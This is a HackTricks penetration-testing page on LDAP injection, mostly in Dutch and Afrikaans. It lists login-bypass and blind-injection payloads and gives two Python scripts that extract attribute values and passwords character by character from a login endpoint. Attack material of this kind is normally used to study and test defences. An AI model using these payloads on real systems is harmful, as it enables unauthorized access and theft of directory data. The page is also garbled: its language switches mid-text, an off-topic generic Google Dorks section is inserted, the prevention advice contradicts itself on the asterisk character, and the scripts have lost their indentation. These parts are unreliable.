hacktricks/pentesting-web/ldap-injection.md

# LDAP-injectie

## LDAP-injectie

<details>

<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Andere manieren om HackTricks te ondersteunen:

* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)!
* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.

</details>

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty-tip**: **meld je aan** voor **Intigriti**, een premium **bug bounty-platform gemaakt door hackers, voor hackers**! Doe vandaag nog mee op [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin met het verdienen van beloningen tot **$100.000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

## LDAP-injectie

### **LDAP**

**Als je wilt weten wat LDAP is, bekijk dan de volgende pagina:**

{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}

**LDAP-injectie** is een aanval gericht op webapplicaties die LDAP-statements construeren op basis van gebruikersinvoer. Het treedt op wanneer de applicatie **niet op de juiste manier invoer sanitizeert**, waardoor aanvallers LDAP-statements kunnen **manipuleren** via een lokale proxy, wat kan leiden tot ongeoorloofde toegang of gegevensmanipulatie.

{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}

**Filter** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = Absolute TRUE\
**(|)** = Absolute FALSE

Bijvoorbeeld:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`

Je kunt toegang krijgen tot de database, en deze kan informatie bevatten van veel verschillende typen.

**OpenLDAP**: Als er 2 filters binnenkomen, wordt alleen de eerste uitgevoerd.\
**ADAM of Microsoft LDS**: Met 2 filters wordt er een foutmelding weergegeven.\
**SunOne Directory Server 5.0**: Voert beide filters uit.

**Het is erg belangrijk om de filter met de juiste syntaxis te verzenden, anders wordt er een foutmelding weergegeven. Het is beter om slechts 1 filter te verzenden.**

De filter moet beginnen met: `&` of `|`\
Voorbeeld: `(&(directory=val1)(folder=public))`

`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`

Vervolgens: `(&(objectClass=`**`*)(ObjectClass=*))`** zal de eerste filter zijn (deze wordt uitgevoerd).

### Login Bypass

LDAP ondersteunt verschillende formaten om het wachtwoord op te slaan: clear, md5, smd5, sh1, sha, crypt. Het kan dus zijn dat onafhankelijk van wat je invoert als wachtwoord, het gehasht wordt.
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```

```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```

```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```

```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```

```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```

```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```

```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```

```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```

```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### Lyste

* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [LDAP Eienskappe](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [LDAP PosixAccount-eienskappe](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)

### Blinde LDAP-injeksie

Jy kan Valse of Waar antwoorde afdwing om te kyk of enige data teruggegee word en 'n moontlike blinde LDAP-injeksie te bevestig:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```

```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### Stort data

Jy kan deur die ASCII-letters, syfers en simbole itereer:
```bash
(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO
(&(sn=administrator)(password=MB*))  : KO
...
```
### Skripte

#### **Ontdek geldige LDAP velde**

LDAP-voorwerpe **bevat standaard verskeie eienskappe** wat gebruik kan word om **inligting te stoor**. Jy kan probeer om **al hierdie eienskappe te deursoek om daardie inligting te onttrek.** Jy kan 'n lys van [**standaard LDAP-eienskappe hier**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt) vind.
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys

proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]

for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break

if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **Spesiale Blinde LDAP-injeksie (sonder "\*")**

------------------------------------------------------------------------------------------------------------------------------

##### **Beskrywing**

Hierdie tipe LDAP-injeksie word gebruik wanneer die toepassing die asterisk ("*") karakter verwyder of blokkeer. Dit maak dit moeilik om die volledige inhoud van die databasis te verkry. Die aanvaller maak gebruik van blinde injeksie om die waarheid van 'n voorwaarde te bepaal en sodoende data te onttrek.

##### **Aanvalstegniek**

1. Identifiseer die aanvalspunt: Soek na invoerveld wat LDAP-verbindings gebruik.
2. Identifiseer die beperkings: Vind die beperkings op die invoerveld, soos die verwydering of blokkering van die asterisk karakter.
3. Bepaal die databasisstruktuur: Gebruik blinde injeksie om die databasisstruktuur te bepaal deur waarheidsgetroue en valse voorwaardes te gebruik.
4. Verkry data: Gebruik die bepaalde databasisstruktuur om data te onttrek deur die waarheid van spesifieke voorwaardes te bepaal.

##### **Voorbeeld**

Stel ons het 'n soekveld wat gebruik word om gebruikersinligting uit 'n LDAP-databasis te verkry. Die asterisk karakter ("*") word verwyder of geblokkeer in die invoerveld.

Die oorspronklike soekopdrag is as volg:

```
(&(uid=*)(cn=*)(sn=*)(givenName=*)(mail=*))
```

Om die volledige inhoud van die databasis te verkry, kan die aanvaller die volgende soekopdrag gebruik:

```
(&(uid=*)(cn=*)(sn=*)(givenName=*)(mail=*)(objectClass=*))(|(uid=*)(cn=*)(sn=*)(givenName=*)(mail=*))
```

Hierdie soekopdrag sal waar wees vir elke inskrywing in die databasis, wat die aanvaller in staat stel om alle data te onttrek.

##### **Voorkoming**

Om hierdie tipe aanval te voorkom, moet die toepassing korrekte invoerverifikasie en -validasie implementeer. Dit moet ook die asterisk karakter ("*") toelaat in die invoerveld vir LDAP-verbindings.
```python
#!/usr/bin/python3

import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"

flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks

### Google Dorks

Google Dorks is a search technique that allows hackers to find specific information on the internet using advanced search operators. These operators can be used to narrow down search results and find sensitive information that is not easily accessible through regular search queries.

Google Dorks can be used for various purposes, including finding vulnerable websites, discovering exposed databases, and identifying potential targets for hacking attacks. By using specific search operators, hackers can uncover information such as usernames, passwords, email addresses, and other sensitive data.

It is important to note that Google Dorks should only be used for ethical purposes, such as penetration testing and vulnerability assessment. Using Google Dorks for malicious activities is illegal and can result in severe consequences.

Here are some examples of commonly used Google Dorks:

- **site:** This operator allows you to search for specific keywords within a particular website or domain. For example, `site:example.com password` will search for the keyword "password" within the domain "example.com".

- **filetype:** This operator allows you to search for specific file types. For example, `filetype:pdf confidential` will search for PDF files containing the keyword "confidential".

- **intitle:** This operator allows you to search for specific keywords within the title of a webpage. For example, `intitle:"login page"` will search for webpages with the title "login page".

- **inurl:** This operator allows you to search for specific keywords within the URL of a webpage. For example, `inurl:admin` will search for webpages with "admin" in the URL.

- **cache:** This operator allows you to view the cached version of a webpage. For example, `cache:example.com` will display the cached version of the webpage "example.com".

These are just a few examples of the many Google Dorks that can be used to find specific information on the internet. It is important to use them responsibly and ethically, and always obtain proper authorization before conducting any penetration testing activities.
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### Meer Payloads

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}

<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

<details>

<summary><strong>Leer AWS hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.

</details>